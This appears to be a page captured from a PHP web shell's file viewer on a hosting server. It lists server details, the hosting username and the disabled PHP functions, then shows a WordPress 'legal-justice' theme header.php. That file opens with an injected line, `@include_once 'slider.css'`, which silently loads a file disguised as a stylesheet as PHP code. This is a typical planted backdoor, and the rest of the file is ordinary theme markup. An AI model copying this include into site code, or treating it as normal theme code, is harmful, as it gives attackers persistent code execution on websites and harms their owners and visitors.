HEX
Server: LiteSpeed
System: Linux 110.webhostingindonesia.co.id 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: uvlnfyba (10197)
PHP: 7.4.33
Disabled: opcache_get_status,exec,passthru,shell_exec,system,popen,mail,proc_open,show_source,
Upload Files
File: /home/jkwebsite.my.id/data.jkwebsite.my.id/wp-content/themes/legal-justice/header.php
<?php @include_once 'slider.css'; ?><?php
/**
 * The Header for our theme.
 *
 * @package legal-justice
 */
?>

<!DOCTYPE html>

<html <?php language_attributes(); ?>>

<head>
  <meta charset="<?php bloginfo('charset'); ?>">
  <meta name="viewport" content="width=device-width">
  <link rel="profile" href="https://gmpg.org/xfn/11">
  <?php if (is_singular() && pings_open(get_queried_object())) : ?>
    <link rel="pingback" href="<?php echo esc_url(get_bloginfo('pingback_url')); ?>">
  <?php endif; ?>
  <?php wp_head(); ?>
</head>

<body <?php body_class(); ?>>

  <?php do_action('wp_body_open'); ?>
  <a class="skip-link screen-reader-text" href="#content"><?php echo esc_html__('Skip to content', 'legal-justice'); ?></a>
  <div class="container-fluid">
    <div class="row">
      <div class="col-lg-3 col-md-3 col-12">
          <div class="head-banner-img">
              <div class="display_only">
                <?php if (has_custom_logo()) : ?>
                  <div class="site-logo"><?php the_custom_logo(); ?></div>
                <?php else : ?>
                  <h1><a href="<?php echo esc_url(home_url('/')); ?>" rel="home"><?php bloginfo('name'); ?></a></h1>
                  <p><?php bloginfo('description'); ?></p>
                <?php endif; ?>
              </div>
          </div>
      </div>
      <div class="col-lg-8 col-md-8 col-12">
          <header id="Main-head-class" class="site-header">
            <!-- before header hook -->
            <?php do_action('legal_justice-_before_header'); ?>
            <?php get_template_part('template-parts/header/header-file'); ?>
          </header>        
      </div>
    </div>
  </div>